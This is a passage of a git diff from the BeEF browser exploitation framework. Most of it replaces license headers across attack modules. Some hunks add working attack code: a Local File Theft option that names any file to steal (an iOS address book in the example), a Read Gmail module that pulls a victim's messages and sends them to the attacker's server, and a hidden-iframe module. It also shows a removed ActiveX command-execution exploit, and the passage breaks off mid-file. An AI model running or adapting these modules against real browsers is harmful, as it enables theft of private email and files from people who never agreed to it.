-# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/ipec/inter_protocol_posix_bindshell/module.rb b/modules/ipec/inter_protocol_posix_bindshell/module.rb index 063cb66d7..cfa507083 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/module.rb +++ b/modules/ipec/inter_protocol_posix_bindshell/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # =begin [+] Summary: diff --git a/modules/ipec/inter_protocol_win_bindshell/command.js b/modules/ipec/inter_protocol_win_bindshell/command.js index 4d4729420..430d157e4 100644 --- a/modules/ipec/inter_protocol_win_bindshell/command.js +++ b/modules/ipec/inter_protocol_win_bindshell/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var target_ip = "<%= @ip %>"; diff --git a/modules/ipec/inter_protocol_win_bindshell/config.yaml b/modules/ipec/inter_protocol_win_bindshell/config.yaml index e49666a0a..aaa438f7b 100644 --- a/modules/ipec/inter_protocol_win_bindshell/config.yaml +++ b/modules/ipec/inter_protocol_win_bindshell/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/ipec/inter_protocol_win_bindshell/module.rb b/modules/ipec/inter_protocol_win_bindshell/module.rb index c8b4e2565..0f4ce6368 100644 --- a/modules/ipec/inter_protocol_win_bindshell/module.rb +++ b/modules/ipec/inter_protocol_win_bindshell/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # =begin [+] Summary: diff --git a/modules/metasploit/browser_autopwn/command.js b/modules/metasploit/browser_autopwn/command.js index 11829cca4..a4f91072c 100644 --- a/modules/metasploit/browser_autopwn/command.js +++ b/modules/metasploit/browser_autopwn/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); sploit.src = '<%= @sploit_url %>'; diff --git a/modules/metasploit/browser_autopwn/config.yaml b/modules/metasploit/browser_autopwn/config.yaml index f2d6c67ce..46198ce73 100644 --- a/modules/metasploit/browser_autopwn/config.yaml +++ b/modules/metasploit/browser_autopwn/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/metasploit/browser_autopwn/module.rb b/modules/metasploit/browser_autopwn/module.rb index 1cebf51ac..bb18a89c4 100644 --- a/modules/metasploit/browser_autopwn/module.rb +++ b/modules/metasploit/browser_autopwn/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Browser_autopwn < BeEF::Core::Command diff --git a/modules/misc/google_search/command.js b/modules/misc/google_search/command.js index 93366a3d5..52b15152f 100644 --- a/modules/misc/google_search/command.js +++ b/modules/misc/google_search/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var query = '<%= @query.gsub(/'/, "\\'") %>'; diff --git a/modules/misc/google_search/config.yaml b/modules/misc/google_search/config.yaml index bc0cc6b8f..fc9868ecb 100644 --- a/modules/misc/google_search/config.yaml +++ b/modules/misc/google_search/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/google_search/module.rb b/modules/misc/google_search/module.rb index afec66958..b93b59719 100644 --- a/modules/misc/google_search/module.rb +++ b/modules/misc/google_search/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Google_search < BeEF::Core::Command diff --git a/modules/misc/iframe_keylogger/command.js b/modules/misc/iframe_keylogger/command.js index 7f1ed6fd1..cafc8cadd 100644 --- a/modules/misc/iframe_keylogger/command.js +++ b/modules/misc/iframe_keylogger/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { // logged keystrokes array diff --git a/modules/misc/iframe_keylogger/config.yaml b/modules/misc/iframe_keylogger/config.yaml index f65092754..c56cb0fef 100644 --- a/modules/misc/iframe_keylogger/config.yaml +++ b/modules/misc/iframe_keylogger/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/iframe_keylogger/module.rb b/modules/misc/iframe_keylogger/module.rb index 6156f8ecd..a57d69285 100644 --- a/modules/misc/iframe_keylogger/module.rb +++ b/modules/misc/iframe_keylogger/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iframe_keylogger < BeEF::Core::Command diff --git a/modules/misc/iframe_sniffer/command.js b/modules/misc/iframe_sniffer/command.js index 21e6987d5..0d041d9aa 100644 --- a/modules/misc/iframe_sniffer/command.js +++ b/modules/misc/iframe_sniffer/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var inputURL = '<%= @inputUrl %>'; var anchorsToCheck = '<%= @anchorsToCheck %>'; diff --git a/modules/misc/iframe_sniffer/config.yaml b/modules/misc/iframe_sniffer/config.yaml index 61c796fa1..70ec201e5 100644 --- a/modules/misc/iframe_sniffer/config.yaml +++ b/modules/misc/iframe_sniffer/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/iframe_sniffer/module.rb b/modules/misc/iframe_sniffer/module.rb index 7af2804af..effa6a213 100644 --- a/modules/misc/iframe_sniffer/module.rb +++ b/modules/misc/iframe_sniffer/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iframe_sniffer < BeEF::Core::Command diff --git a/modules/misc/invisible_iframe/command.js b/modules/misc/invisible_iframe/command.js new file mode 100644 index 000000000..01eab25c9 --- /dev/null +++ b/modules/misc/invisible_iframe/command.js @@ -0,0 +1,15 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var target = "<%= @target %>"; + var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); + iframe_<%= @command_id %>.setAttribute('src', target); + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=IFrame created'); + +}); diff --git a/modules/misc/invisible_iframe/config.yaml b/modules/misc/invisible_iframe/config.yaml new file mode 100644 index 000000000..b7686b944 --- /dev/null +++ b/modules/misc/invisible_iframe/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + invisible_iframe: + enable: true + category: "Misc" + name: "Create Invisible Iframe" + description: "Creates an invisible iframe." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/misc/invisible_iframe/module.rb b/modules/misc/invisible_iframe/module.rb new file mode 100644 index 000000000..357c78f96 --- /dev/null +++ b/modules/misc/invisible_iframe/module.rb @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Invisible_iframe < BeEF::Core::Command + + def self.options + return [ + {'name' => 'target', 'ui_label' => 'URL', 'value' => 'http://beefproject.com/'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/misc/local_file_theft/command.js b/modules/misc/local_file_theft/command.js index 148f79d8f..868eb9b4c 100644 --- a/modules/misc/local_file_theft/command.js +++ b/modules/misc/local_file_theft/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // local_file_theft // // Shamelessly plagurised from kos.io/xsspwn @@ -86,6 +77,16 @@ result = ''; } } + fileList['custom']= { + // user defined + "discover" :'', + + "post" :{ + 'result':'<%== @target_file %>', + } + } + + functionList = { mac:{ // OS X disovery @@ -138,11 +139,25 @@ result = ''; grabFiles(homedir,"ios") } } - - alert("ipad") + return true; } }, + custom:{ + // Grab custom stuff + discover : function(){ + tmp = new XMLHttpRequest() + tmp.open('get',fileList['custom']['discover']) + tmp.send() + tmp.onreadystatechange=function(){ + if(tmp.readyState==4){ + homedir = "file:///"; + grabFiles(homedir,"custom") + } + } + return true; + } + }, android:{ // figure out what app (gmail, browser, or dolphin?) android discover : function(){ @@ -172,19 +187,27 @@ result = ''; function identify(){ - if(/.*Android.*/.test(navigator.userAgent)){ - return "android" - } else if(/Linux.*/i.test(navigator.platform)){ - return "linux" - } else if(/iP.*/i.test(navigator.platform)){ - return "ios" - } else if(/.*Mac.*/i.test(navigator.userAgent)){ - return "mac" - } else if(/.*Windows.*/i.test(navigator.userAgent)){ - return "windows" - } else if(/.*hpwOS.*/i.test(navigator.platform)){ - return "webos" - } + + // custom file is specified + if ('<%== @target_file %>' != 'autodetect') { + return "custom" + + // determine a good file to steal based on platform + } else { + if(/.*Android.*/.test(navigator.userAgent)){ + return "android" + } else if(/Linux.*/i.test(navigator.platform)){ + return "linux" + } else if(/iP.*/i.test(navigator.platform)){ + return "ios" + } else if(/.*Mac.*/i.test(navigator.userAgent)){ + return "mac" + } else if(/.*Windows.*/i.test(navigator.userAgent)){ + return "windows" + } else if(/.*hpwOS.*/i.test(navigator.platform)){ + return "webos" + } + } } diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml index 4c44194e1..27ae15b9a 100644 --- a/modules/misc/local_file_theft/config.yaml +++ b/modules/misc/local_file_theft/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # local_file_theft # @@ -23,7 +13,7 @@ beef: enable: true category: "Misc" name: "Local File Theft" - description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme. This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in safari from the your localfile system." + description: "JavaScript may have filesystem access if we are running from a local resource and using the file:// scheme.
This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in Safari from the your localfile system." authors: ["mh"] target: - working: ["All"] + working: ["S"] diff --git a/modules/misc/local_file_theft/module.rb b/modules/misc/local_file_theft/module.rb index d75a3d236..f720d70a4 100644 --- a/modules/misc/local_file_theft/module.rb +++ b/modules/misc/local_file_theft/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # local_file_theft # @@ -19,6 +9,16 @@ class Local_file_theft < BeEF::Core::Command + def self.options + return [ + {'name' => 'target_file', + 'description' => 'The full path to the local file to steal e.g. file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb', + 'ui_label' => 'Target file', + 'value' => 'autodetect' + } + ] + end + def post_execute content = {} content['result'] = @datastore['result'] diff --git a/modules/misc/raw_javascript/command.js b/modules/misc/raw_javascript/command.js index 15ece6d01..ac69d88d4 100644 --- a/modules/misc/raw_javascript/command.js +++ b/modules/misc/raw_javascript/command.js @@ -1,33 +1,24 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { - var result; - - try { - result = function() {<%= @cmd %>}(); - } catch(e) { - for(var n in e) - result+= n + " " + e[n] + "\n"; - } - - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); -}); - - - - - - +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var result; + + try { + result = function() {<%= @cmd %>}(); + } catch(e) { + for(var n in e) + result+= n + " " + e[n] + "\n"; + } + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); +}); + + + + + + diff --git a/modules/misc/raw_javascript/config.yaml b/modules/misc/raw_javascript/config.yaml index 3f9512332..f344295f8 100644 --- a/modules/misc/raw_javascript/config.yaml +++ b/modules/misc/raw_javascript/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/raw_javascript/module.rb b/modules/misc/raw_javascript/module.rb index 5a507d0b8..c5f97855d 100644 --- a/modules/misc/raw_javascript/module.rb +++ b/modules/misc/raw_javascript/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Raw_javascript < BeEF::Core::Command diff --git a/modules/exploits/activex_command_execution/command.js b/modules/misc/read_gmail/command.js old mode 100755 new mode 100644 similarity index 60% rename from modules/exploits/activex_command_execution/command.js rename to modules/misc/read_gmail/command.js index c6eeac3d6..680c50088 --- a/modules/exploits/activex_command_execution/command.js +++ b/modules/misc/read_gmail/command.js @@ -14,21 +14,31 @@ // limitations under the License. // beef.execute(function() { + var result; - var cmd = '<%= @cmd.gsub(/'/, "\\'") %>'; - var result = "command was not sent"; + try { + x = new XMLHttpRequest(); + x.open('get', 'https://mail.google.com/mail/feed/atom', false); + x.send(); - try { - var shell = new ActiveXObject('WSCRIPT.Shell').Run(cmd); - if (shell.toString() == 0) { - result = "command sent"; - } else { - result = "command failed"; + str = x.responseText; var re = /message_id=([A-Z,a-z,0-9]*)/g; + var match; + while(match = re.exec(str)) { + x = new XMLHttpRequest(); + x.open('get', 'https://mail.google.com/mail/u/0/h/?&v=om&th='+match[1]+'&f=1&f=1', false); + x.send(); + result += x.responseText; } - } catch(e) { - result = "command failed"; - } - + + } catch(e) { + for(var n in e) + result+= n + " " + e[n] + "\n"; + } beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); - }); + + + + + + diff --git a/modules/exploits/activex_command_execution/config.yaml b/modules/misc/read_gmail/config.yaml old mode 100755 new mode 100644 similarity index 59% rename from modules/exploits/activex_command_execution/config.yaml rename to modules/misc/read_gmail/config.yaml index 1e0995937..2b0baefbf --- a/modules/exploits/activex_command_execution/config.yaml +++ b/modules/misc/read_gmail/config.yaml @@ -15,12 +15,11 @@ # beef: module: - activex_command_execution: + read_gmail: enable: true - category: "Exploits" - name: "ActiveX Command Execution" - description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.

The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled." - authors: ["bcoles"] + category: "Misc" + name: "Read Gmail" + description: "If we are able to run in the context of mail.google.com (either by SOP bypass or other issue) then lets go read some email, grabs unread message ids from gmails atom feed, then grabs conent of each message" + authors: ["mh"] target: - user_notify: ["IE"] - not_working: ["ALL"] + user_notify: ['ALL'] diff --git a/modules/exploits/window_mail_client_dos/module.rb b/modules/misc/read_gmail/module.rb similarity index 75% rename from modules/exploits/window_mail_client_dos/module.rb rename to modules/misc/read_gmail/module.rb index d752b3e4b..d0ec4d52c 100644 --- a/modules/exploits/window_mail_client_dos/module.rb +++ b/modules/misc/read_gmail/module.rb @@ -13,6 +13,14 @@ # See the License for the specific language governing permissions and # limitations under the License. # -class Windows_mail_client_dos < BeEF::Core::Command +class Read_gmail < BeEF::Core::Command + # + # This method is being called when a zombie sends some + # data back to the framework. + # + def post_execute + save({'result' => @datastore['result']}) + end + end diff --git a/modules/network/detect_soc_nets/command.js b/modules/network/detect_soc_nets/command.js index 333bce662..162cffb53 100644 --- a/modules/network/detect_soc_nets/command.js +++ b/modules/network/detect_soc_nets/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var facebookresult = ""; diff --git a/modules/network/detect_soc_nets/config.yaml b/modules/network/detect_soc_nets/config.yaml index 90a1c6355..33e374c5e 100644 --- a/modules/network/detect_soc_nets/config.yaml +++ b/modules/network/detect_soc_nets/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/detect_soc_nets/module.rb b/modules/network/detect_soc_nets/module.rb index 